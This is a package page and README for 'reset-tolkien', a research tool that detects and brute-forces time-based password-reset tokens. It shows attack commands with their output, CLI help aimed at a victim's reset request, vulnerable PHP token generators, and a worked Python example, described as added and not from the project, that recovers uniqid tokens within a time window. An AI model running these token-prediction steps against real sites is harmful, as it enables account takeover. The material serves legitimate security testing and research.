| Field | Value |
| --- | --- |
| Name | reset-tolkien |
| Version | 1.3.4 |
| Summary | Unsecure time-based secret exploitation and Sandwich attack implementation. |
| Upload time | 2024-12-09 19:34:07 |
| Author / maintainer | Tom CHAMBARETAUD <contact@aeth.cc> |
| Requires Python | >=3.10 |
| License | MIT License, Copyright (c) 2024 Tom Chambaretaud |
| Keywords | security, secret, reset, token, tolkien |
| Homepage / Repository | https://github.com/AethliosIK/reset-tolkien |
| Issues | https://github.com/AethliosIK/reset-tolkien/issues |
| Changelog | https://github.com/AethliosIK/reset-tolkien/blob/master/CHANGELOG.md |
| Requirements | dateparser==1.1.8, hi-dateinfer==0.4.6, python-dateutil==2.9.0.post0, pytz==2024.2, PyYAML==6.0.1, regex==2024.9.11, shortuuid==1.0.11, six==1.16.0, tqdm==4.66.5, typing_extensions==4.12.2, tzlocal==5.2 |
# Reset Tolkien
## Unsecure time-based secret exploitation and Sandwich attack implementation
![image.png](image.png)
This tool is the result of research into "Unsecure time-based secrets" from this article:
- [\[EN\] Unsecure time-based secret and Sandwich Attack - Analysis of my research and release of the "Reset Tolkien" tool](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html)
To better understand how to use this tool, we strongly recommend that you read it first.
> *Yeah, this tool is based on a rather grotesque pun.*
- - -
## Installation
Install from [pip](https://pypi.org/project/reset-tolkien/):
```
▶ pip install reset-tolkien
```
## Installation from Docker
```
▶ git clone https://github.com/AethliosIK/reset-tolkien.git
▶ cd reset-tolkien
▶ docker build -t reset-tolkien:latest .
▶ docker run --rm -it --net=host -v "$PWD:/reset-tolkien/" reset-tolkien:latest -h
```
## Usage
To detect whether a token is time-based, simply use this command:
```bash
$ reset-tolkien detect 660430516ffcf -d "Wed, 27 Mar 2024 14:42:25 GMT" --prefixes "attacker@example.com" --suffixes "attacker@example.com" --timezone "-7"
The token may be based on a timestamp: 1711550545.458703 (prefix: None / suffix: None)
The convertion logic is "uniqid"
```
To attack this token, use this command to export possible tokens:
```bash
$ reset-tolkien sandwich 660430516ffcf -bt 1711550546.485597 -et 1711550546.505134 -o output.txt --token-format="uniqid"
Tokens have been exported in "output.txt"
```
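Both commands above work because a PHP `uniqid()` value is nothing more than its creation time written in hex. The following added example (not code from the reset-tolkien project) reimplements that core in plain Python: it decodes the README's token back to the timestamp that `detect` reports, counts the candidate space inside the README's `sandwich` window, searches that window for the raw and the `hash(uniqid())` variants of the token, and contrasts this with a CSPRNG-generated token. Function names such as `window_candidates`, `match_in_window` and `apply_hash` are this example's own, not the tool's API.

```python
"""Added worked example (not code from the reset-tolkien project): a PHP-style
uniqid() token encodes its own creation time, so the `detect` step can map it
back to a timestamp and the `sandwich` step only has to try the microsecond
ticks between two attacker-controlled requests.  Token and timestamps below are
the ones quoted in the README's usage examples."""
import hashlib
import secrets
from email.utils import parsedate_to_datetime
from typing import Iterator, Optional

MICRO = 1_000_000  # uniqid resolution: microseconds


def uniqid(ts: float) -> str:
    """PHP uniqid(): 8 hex digits of seconds + 5 hex digits of microseconds."""
    sec = int(ts)
    usec = int(round((ts - sec) * MICRO))
    return f"{sec:08x}{usec:05x}"


def uniqid_to_timestamp(token: str) -> Optional[float]:
    """Inverse of uniqid(); None when the token cannot be a uniqid value."""
    if len(token) != 13:
        return None
    try:
        sec, usec = int(token[:8], 16), int(token[8:], 16)
    except ValueError:
        return None
    if usec >= MICRO:  # 5 hex digits can hold up to 0xfffff, but usec < 1e6
        return None
    return sec + usec / MICRO


def detect_uniqid(token: str, request_date: str, tolerance_s: float = 2.0) -> Optional[float]:
    """`detect`-style check: does the token decode to a time within tolerance_s
    of the server's Date header on the reset request?  Returns that timestamp."""
    ts = uniqid_to_timestamp(token)
    if ts is None:
        return None
    request_ts = parsedate_to_datetime(request_date).timestamp()
    return ts if abs(ts - request_ts) <= tolerance_s else None


def window_size(begin: float, end: float) -> int:
    """Number of distinct uniqid values between two timestamps (inclusive)."""
    return int(round(end * MICRO)) - int(round(begin * MICRO)) + 1


def window_candidates(begin: float, end: float) -> Iterator[str]:
    """Every uniqid value a server could have produced inside the window
    bounded by the attacker's own two requests (the 'sandwich')."""
    first, last = int(round(begin * MICRO)), int(round(end * MICRO))
    for tick in range(first, last + 1):
        yield f"{tick // MICRO:08x}{tick % MICRO:05x}"


def apply_hash(value: str, hash_name: str) -> str:
    """Token formats like hash(uniqid()) from the default tests (case 3)."""
    return hashlib.new(hash_name, value.encode()).hexdigest()


def match_in_window(token: str, begin: float, end: float,
                    hash_name: Optional[str] = None) -> Optional[str]:
    """`sandwich`-style search: which uniqid in the window yields the token,
    either raw (case 1) or after hashing (case 3)?  None if no candidate does."""
    for cand in window_candidates(begin, end):
        if (apply_hash(cand, hash_name) if hash_name else cand) == token:
            return cand
    return None


def secure_reset_token() -> str:
    """The fix: 256 bits from a CSPRNG, carrying no timestamp to recover."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    token = "660430516ffcf"
    print("decoded:", detect_uniqid(token, "Wed, 27 Mar 2024 14:42:25 GMT"))
    # The README's sandwich window is about 20 ms wide: only ~19.5k candidates.
    print("candidates:", window_size(1711550546.485597, 1711550546.505134))
    print("md5 variant found:", match_in_window(apply_hash(token, "md5"),
                                                 1711550545.45, 1711550545.46, "md5"))
    print("secure token decodes to:", uniqid_to_timestamp(secure_reset_token()))
```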
## Supported encodings and hash functions
The tool recursively tests different token formats:
- `base32`
- `base64`
- `urlencode`
- `hexint`
- `hexstr`: ASCII integer encoding
- `uniqid`: the PHP function `uniqid` previously studied
- `uuidv1`: the format of a time-based UUID Version 1
- `shortuuid`: a popular UUID encoding function
- `mongodb_objectid`: the Mongo DB data format studied above
- `datetime`: the encoding of a date from a custom date format
- `datetimeRFC2822`: encoding a date using the format from the RFC2822 standard
The tool also manages the most popular hash functions:
- `md5`
- `sha1`
- `sha224`
- `sha256`
- `sha384`
- `sha512`
- `sha3_224`
- `sha3_256`
- `sha3_384`
- `sha3_512`
- `blake_256`
- `blake_512`
## Help
```bash
usage: reset-tolkien [-h] [-v] {detect,bruteforce,sandwich} ...

Reset Tolkien can be used to find out whether a provided token is based on a
timestamp, from a timestamp corresponding to the period in which it was
generated.

options:
  -h, --help            show this help message and exit
  -v, --version         Print tool version

action:
  {detect,bruteforce,sandwich}
    detect              Detect the format of reset token
    bruteforce          Attack the reset token
    sandwich            Attack the reset token with sandwich method
```
The various features of the tool are as follows:
- `detect`: detects whether a provided token is based on a date, provided or not:
```bash
usage: reset-tolkien detect [-h] [-r] [-v {0,1,2}] [-c CONFIG] [--threads THREADS]
                            [--date-format-of-token DATE_FORMAT_OF_TOKEN]
                            [--only-int-timestamp] [--decimal-length DECIMAL_LENGTH]
                            [--int-timestamp-range INT_TIMESTAMP_RANGE]
                            [--float-timestamp-range FLOAT_TIMESTAMP_RANGE]
                            [--timezone TIMEZONE] [-l {1,2,3}] [-t TIMESTAMP]
                            [-d DATETIME] [--datetime-format DATETIME_FORMAT]
                            [--prefixes PREFIXES] [--suffixes SUFFIXES]
                            [--hashes HASHES]
                            token

positional arguments:
  token                 The token given as input.

options:
  -h, --help            show this help message and exit
  -r, --roleplay        Not recommended if you don't have anything else to do
  -v {0,1,2}, --verbosity {0,1,2}
                        Verbosity level (default: 0)
  -c CONFIG, --config CONFIG
                        Config file to set TimestampHashFormat (default: resetTolkien/config/default.yml)
  --threads THREADS     Define the number of parallelized tasks for the
                        decryption attack on the hash. (default: 8)
  --date-format-of-token DATE_FORMAT_OF_TOKEN
                        Date format for the token - please set it if you have
                        found a date as input.
  --only-int-timestamp  Only use integer timestamp. (default: False)
  --decimal-length DECIMAL_LENGTH
                        Length of the float timestamp (default: 7)
  --int-timestamp-range INT_TIMESTAMP_RANGE
                        Time range over which the int timestamp will be tested
                        before and after the input value (default: 60s)
  --float-timestamp-range FLOAT_TIMESTAMP_RANGE
                        Time range over which the float timestamp will be
                        tested before and after the input value (default: 2s)
  --timezone TIMEZONE   Timezone of the application for datetime value
                        (default: 0)
  -l {1,2,3}, --level {1,2,3}
                        Level of search depth (default: 3)
  -t TIMESTAMP, --timestamp TIMESTAMP
                        The timestamp of the reset request
  -d DATETIME, --datetime DATETIME
                        The datetime of the reset request
  --datetime-format DATETIME_FORMAT
                        The input datetime format (default: server date format
                        like "Sun, 30 Jun 2024 01:38:41 UTC")
  --prefixes PREFIXES   List of possible values for the prefix concatenated
                        with the timestamp. Format: prefix1,prefix2
  --suffixes SUFFIXES   List of possible values for the suffix concatenated
                        with the timestamp. Format: suffix1,suffix2
  --hashes HASHES       List of possible hashes to try to detect the format.
                        Format: suffix1,suffix2 (default: all identified hash)
```
- `bruteforce`: provides a list of possible tokens from an arbitrarily defined token format and time frame:
```bash
usage: reset-tolkien bruteforce [-h] [-r] [-v {0,1,2}] [-c CONFIG]
                                [--threads THREADS]
                                [--date-format-of-token DATE_FORMAT_OF_TOKEN]
                                [--only-int-timestamp]
                                [--decimal-length DECIMAL_LENGTH]
                                [--int-timestamp-range INT_TIMESTAMP_RANGE]
                                [--float-timestamp-range FLOAT_TIMESTAMP_RANGE]
                                [--timezone TIMEZONE] [-t TIMESTAMP] [-d DATETIME]
                                [--datetime-format DATETIME_FORMAT]
                                [--token-format TOKEN_FORMAT] [--prefix PREFIX]
                                [--suffix SUFFIX] [-o OUTPUT] [--with-timestamp]
                                token

positional arguments:
  token                 The token given as input.

options:
  -h, --help            show this help message and exit
  -r, --roleplay        Not recommended if you don't have anything else to do
  -v {0,1,2}, --verbosity {0,1,2}
                        Verbosity level (default: 0)
  -c CONFIG, --config CONFIG
                        Config file to set TimestampHashFormat (default: resetTolkien/config/default.yml)
  --threads THREADS     Define the number of parallelized tasks for the
                        decryption attack on the hash. (default: 8)
  --date-format-of-token DATE_FORMAT_OF_TOKEN
                        Date format for the token - please set it if you have
                        found a date as input.
  --only-int-timestamp  Only use integer timestamp. (default: False)
  --decimal-length DECIMAL_LENGTH
                        Length of the float timestamp (default: 7)
  --int-timestamp-range INT_TIMESTAMP_RANGE
                        Time range over which the int timestamp will be tested
                        before and after the input value (default: 60s)
  --float-timestamp-range FLOAT_TIMESTAMP_RANGE
                        Time range over which the float timestamp will be
                        tested before and after the input value (default: 2s)
  --timezone TIMEZONE   Timezone of the application for datetime value
                        (default: 0)
  -t TIMESTAMP, --timestamp TIMESTAMP
                        The timestamp of the reset request with victim email
  -d DATETIME, --datetime DATETIME
                        The datetime of the reset request with victim email
  --datetime-format DATETIME_FORMAT
                        The input datetime format (default: server date format
                        like "Sun, 30 Jun 2024 01:40:15 UTC")
  --token-format TOKEN_FORMAT
                        The token encoding/hashing format - Format:
                        encoding1,encoding2
  --prefix PREFIX       The prefix value concatenated with the timestamp.
  --suffix SUFFIX       The suffix value concatenated with the timestamp.
  -o OUTPUT, --output OUTPUT
                        The filename of the output
  --with-timestamp      Write the output with timestamp
```
- `sandwich`: provides a list of possible tokens based on a token format and a time frame bounded by two dates:
```bash
usage: reset-tolkien sandwich [-h] [-r] [-v {0,1,2}] [-c CONFIG] [--threads THREADS]
                              [--date-format-of-token DATE_FORMAT_OF_TOKEN]
                              [--only-int-timestamp]
                              [--decimal-length DECIMAL_LENGTH]
                              [--int-timestamp-range INT_TIMESTAMP_RANGE]
                              [--float-timestamp-range FLOAT_TIMESTAMP_RANGE]
                              [--timezone TIMEZONE] [-bt BEGIN_TIMESTAMP]
                              [-et END_TIMESTAMP] [-bd BEGIN_DATETIME]
                              [-ed END_DATETIME] [--datetime-format DATETIME_FORMAT]
                              [--token-format TOKEN_FORMAT] [--prefix PREFIX]
                              [--suffix SUFFIX] [-o OUTPUT] [--with-timestamp]
                              token

positional arguments:
  token                 The token given as input.

options:
  -h, --help            show this help message and exit
  -r, --roleplay        Not recommended if you don't have anything else to do
  -v {0,1,2}, --verbosity {0,1,2}
                        Verbosity level (default: 0)
  -c CONFIG, --config CONFIG
                        Config file to set TimestampHashFormat (default: resetTolkien/config/default.yml)
  --threads THREADS     Define the number of parallelized tasks for the
                        decryption attack on the hash. (default: 8)
  --date-format-of-token DATE_FORMAT_OF_TOKEN
                        Date format for the token - please set it if you have
                        found a date as input.
  --only-int-timestamp  Only use integer timestamp. (default: False)
  --decimal-length DECIMAL_LENGTH
                        Length of the float timestamp (default: 7)
  --int-timestamp-range INT_TIMESTAMP_RANGE
                        Time range over which the int timestamp will be tested
                        before and after the input value (default: 60s)
  --float-timestamp-range FLOAT_TIMESTAMP_RANGE
                        Time range over which the float timestamp will be
                        tested before and after the input value (default: 2s)
  --timezone TIMEZONE   Timezone of the application for datetime value
                        (default: 0)
  -bt BEGIN_TIMESTAMP, --begin-timestamp BEGIN_TIMESTAMP
                        The begin timestamp of the reset request with victim
                        email
  -et END_TIMESTAMP, --end-timestamp END_TIMESTAMP
                        The end timestamp of the reset request with victim
                        email
  -bd BEGIN_DATETIME, --begin-datetime BEGIN_DATETIME
                        The begin datetime of the reset request with victim
                        email
  -ed END_DATETIME, --end-datetime END_DATETIME
                        The end datetime of the reset request with victim
                        email
  --datetime-format DATETIME_FORMAT
                        The input datetime format (default: server date format
                        like "Sun, 30 Jun 2024 01:40:54 UTC")
  --token-format TOKEN_FORMAT
                        The token encoding/hashing format - Format:
                        encoding1,encoding2
  --prefix PREFIX       The prefix value concatenated with the timestamp.
  --suffix SUFFIX       The suffix value concatenated with the timestamp.
  -o OUTPUT, --output OUTPUT
                        The filename of the output
  --with-timestamp      Write the output with timestamp
```
## Default tests
By default, the tool is configured to detect this type of time-based token generation:
```php
// Illustrative generators: hash() stands for any of the supported hash
// functions listed above, applied to a value that depends only on the clock.
function getToken($level, $email)
{
    switch ($level) {
        case 1:
            return uniqid();
        case 2:
            return hash(time());
        case 3:
            return hash(uniqid());
        case 4:
            return hash(uniqid() . $email);
        case 5:
            return hash(date(DATE_RFC2822));
        case 6:
            return hash($email . uniqid() . $email);
        case 7:
            return uuid1("Test");
    }
}
```
## Customised test configuration
In addition, the tool allows you to define your own token formats before applying a hash function via a `TimestampHashFormat` object. For example, to test whether the token is generated using this token generation function:
```python
import datetime
import hashlib


def uniqid(t: float) -> str:
    # PHP-style uniqid(): 8 hex digits of seconds + 5 hex digits of microseconds
    sec = int(t)
    usec = int(round((t - sec) * 1_000_000))
    return f"{sec:08x}{usec:05x}"


# Generate a formatted token: md5 over a uniqid built from the current UTC time
def generate_token():
    t = datetime.datetime.now(datetime.timezone.utc).timestamp()
    token = hashlib.md5(uniqid(t).encode()).hexdigest()
    return token
```
This can be defined in the YAML configuration file:
```yaml
float-uniqid:
  description: "Uniqid timestamp"
  level: 2
  timestamp_type: float
  formats:
    - uniqid
```
## The "Todo" list
Of course, as with any tool, there is always the possibility of adding new features to complement it.
Among the points that would be very useful:
- **Format management via [Abstract syntax tree](https://docs.python.org/3/library/ast.html)**: the tool currently only manages formats applied in a linear way, so a simple format like `md5(timestamp()+1)` won't be supported. By configuring formats as a tree, this type of format can be supported by the tool.
- **Better application of user-specific information**: when detecting a token format, it is possible to define user-specific information as prefixes or suffixes of the token generation date. Many other configurations could be possible.
- **Management of other dynamic variables**: the tool detects formats and allows attacks based on the only variable supported: time. However, some formats can have several variables that evolve.
- **Addition of new supported formats**: the tool only supports the time-based functions found during my research, but many other formats should still exist and could also be supported by the tool.
## Changelog
The changes in each version are listed in [CHANGELOG.md](CHANGELOG.md).
## Licensing
This project is licensed under the [MIT license](LICENSE).
## Credit
- Main illustration: service provided by [@valentin.froute](https://www.instagram.com/valentin.froute/).